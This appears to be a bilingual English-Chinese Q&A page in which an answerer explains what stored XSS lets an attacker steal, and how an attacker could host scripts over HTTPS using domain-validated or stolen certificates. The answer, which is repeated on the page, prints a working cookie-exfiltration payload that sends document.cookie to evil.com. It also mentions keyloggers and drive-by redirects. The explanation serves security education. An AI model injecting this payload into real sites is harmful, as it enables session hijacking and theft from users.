在实践中使用Xss跨站点脚本

时间:2021-03-01 14:53:18

I know xss attack usees input points of a page to insert javascript code into the page or into server db. In both cases the javascript code will be activated soon or later on some events. I imagine an attacker that uses a browser to put javascript code into a server db using maybe an input name. Another client(victim) makes a request to the same server , maybe it asks for the user classific. The attacker is in classific , so the attacker name(actually evil javascript code) is inserted in the page the victim requested.

我知道xss攻击使用页面的输入点将javascript代码插入页面或服务器db。在这两种情况下,javascript代码将在某些事件中很快或稍后激活。我想象一个攻击者使用浏览器将javascript代码放入服务器数据库中,可能使用输入名称。另一个客户端(受害者)向同一服务器发出请求,也许它要求用户分类。攻击者处于分类状态,因此攻击者名称(实际上是邪恶的javascript代码)被插入受害者请求的页面中。

The question is what information can the attacker steal and how?

问题是攻击者可以窃取哪些信息以及如何窃取?

I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected. In this way he can pass to the jsp/asp or whatever information about cookies.

我想攻击者想要获取cookie。我想他想要包含一个他的邪恶脚本注入javascript代码。通过这种方式,他可以传递给jsp / asp或任何有关cookie的信息。

So if the site is in https , it's possible to include scripts which are in http server? I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.

因此,如果站点是https,那么可以包含h​​ttp服务器中的脚本吗?我不相信攻击者使用https服务器来存储他的脚本,因为它很快就会被轻易逮捕。

Or maybe there are other ways for the attacker to get information?

或者攻击者可能还有其他方法可以获取信息?

1 个解决方案

#1


1  

I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected. In this way he can pass to the jsp/asp or whatever information about cookies.

我想攻击者想要获取cookie。我想他想要包含一个他的邪恶脚本注入javascript代码。通过这种方式,他可以传递给jsp / asp或任何有关cookie的信息。

The question is what information can the attacker steal and how?

问题是攻击者可以窃取哪些信息以及如何窃取?

Yes, the easiest type of attack would be to steal non HttpOnly cookies.

是的,最简单的攻击类型是窃取非HttpOnly cookie。

<script>
new Image().src = 'https://www.evil.com/?' + escape(document.cookie);
</script>

Other attacks include injecting JavaScript keyloggers that send key strokes back to the attacker in a similar fashion, or redirecting the user to phishing sites or to sites containing drive by downloads.

其他攻击包括注入JavaScript键盘记录程序,以类似的方式将击键发送回攻击者,或者将用户重定向到网络钓鱼站点或下载包含驱动器的站点。

So if the site is in https , it's possible to include scripts which are in http server? I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.

因此,如果站点是https,那么可以包含h​​ttp服务器中的脚本吗?我不相信攻击者使用https服务器来存储他的脚本,因为它很快就会被轻易逮捕。

Interesting question. Yes, the site being HTTPS does not reduce the chances of an XSS flaw. They would need to host their attacking page on a HTTPS enabled web server with a certificate trusted by their victim's machine. This could either be the attackers own machine with a cheap SSL certificate paid for by BitCoin where only the domain is validated (not the organisation), it could be an already compromised machine (e.g. if the attacker already has control over another public website), or it could be a stolen certificate from another hacked site that the attacker is now using on their domain (in combination with a DNS hijack or MITM). Edit: Now it is possible to get free certs from the likes of Let's Encrypt and similar.

有趣的问题。是的,该网站是HTTPS不会减少XSS漏洞的可能性。他们需要在启用HTTPS的Web服务器上托管其攻击页面,并使用受害者机器信任的证书。这可能是攻击者自己的机器,由BitCoin支付的廉价SSL证书,只有域验证(不是组织),它可能是一个已经被入侵的机器(例如,如果攻击者已经控制了另一个公共网站),或者它可能是攻击者现在在其域上使用的另一个被黑网站的被盗证书(与DNS劫持或MITM结合使用)。编辑:现在可以从Let's Encrypt等类似的地方获得免费证书。

Little security is required to get a Domain Validated certificate:

获取域验证证书需要很少的安全性:

Low assurance certificates include only your domain name in the certificate. Certificate Authorities usually verify that you own the domain name by checking the WHOIS record. The certificate can be issued instantly and is cheaper but, as the name implies, these certificates provide less assurance to your customers.

低保证书仅包含证书中的域名。证书颁发机构通常通过检查WHOIS记录来验证您是否拥有域名。证书可以立即发出并且更便宜,但顾名思义,这些证书对您的客户提供的保证较少。

#1


1  

I imagine the attacker wants to get cookies. And I imagine he wants include one his evil script with the javascript code injected. In this way he can pass to the jsp/asp or whatever information about cookies.

我想攻击者想要获取cookie。我想他想要包含一个他的邪恶脚本注入javascript代码。通过这种方式,他可以传递给jsp / asp或任何有关cookie的信息。

The question is what information can the attacker steal and how?

问题是攻击者可以窃取哪些信息以及如何窃取?

Yes, the easiest type of attack would be to steal non HttpOnly cookies.

是的,最简单的攻击类型是窃取非HttpOnly cookie。

<script>
new Image().src = 'https://www.evil.com/?' + escape(document.cookie);
</script>

Other attacks include injecting JavaScript keyloggers that send key strokes back to the attacker in a similar fashion, or redirecting the user to phishing sites or to sites containing drive by downloads.

其他攻击包括注入JavaScript键盘记录程序,以类似的方式将击键发送回攻击者,或者将用户重定向到网络钓鱼站点或下载包含驱动器的站点。

So if the site is in https , it's possible to include scripts which are in http server? I don't believe the attacker uses https server to store his scripts because it could be soon easily arrested.

因此,如果站点是https,那么可以包含h​​ttp服务器中的脚本吗?我不相信攻击者使用https服务器来存储他的脚本,因为它很快就会被轻易逮捕。

Interesting question. Yes, the site being HTTPS does not reduce the chances of an XSS flaw. They would need to host their attacking page on a HTTPS enabled web server with a certificate trusted by their victim's machine. This could either be the attackers own machine with a cheap SSL certificate paid for by BitCoin where only the domain is validated (not the organisation), it could be an already compromised machine (e.g. if the attacker already has control over another public website), or it could be a stolen certificate from another hacked site that the attacker is now using on their domain (in combination with a DNS hijack or MITM). Edit: Now it is possible to get free certs from the likes of Let's Encrypt and similar.

有趣的问题。是的,该网站是HTTPS不会减少XSS漏洞的可能性。他们需要在启用HTTPS的Web服务器上托管其攻击页面,并使用受害者机器信任的证书。这可能是攻击者自己的机器,由BitCoin支付的廉价SSL证书,只有域验证(不是组织),它可能是一个已经被入侵的机器(例如,如果攻击者已经控制了另一个公共网站),或者它可能是攻击者现在在其域上使用的另一个被黑网站的被盗证书(与DNS劫持或MITM结合使用)。编辑:现在可以从Let's Encrypt等类似的地方获得免费证书。

Little security is required to get a Domain Validated certificate:

获取域验证证书需要很少的安全性:

Low assurance certificates include only your domain name in the certificate. Certificate Authorities usually verify that you own the domain name by checking the WHOIS record. The certificate can be issued instantly and is cheaper but, as the name implies, these certificates provide less assurance to your customers.

低保证书仅包含证书中的域名。证书颁发机构通常通过检查WHOIS记录来验证您是否拥有域名。证书可以立即发出并且更便宜,但顾名思义,这些证书对您的客户提供的保证较少。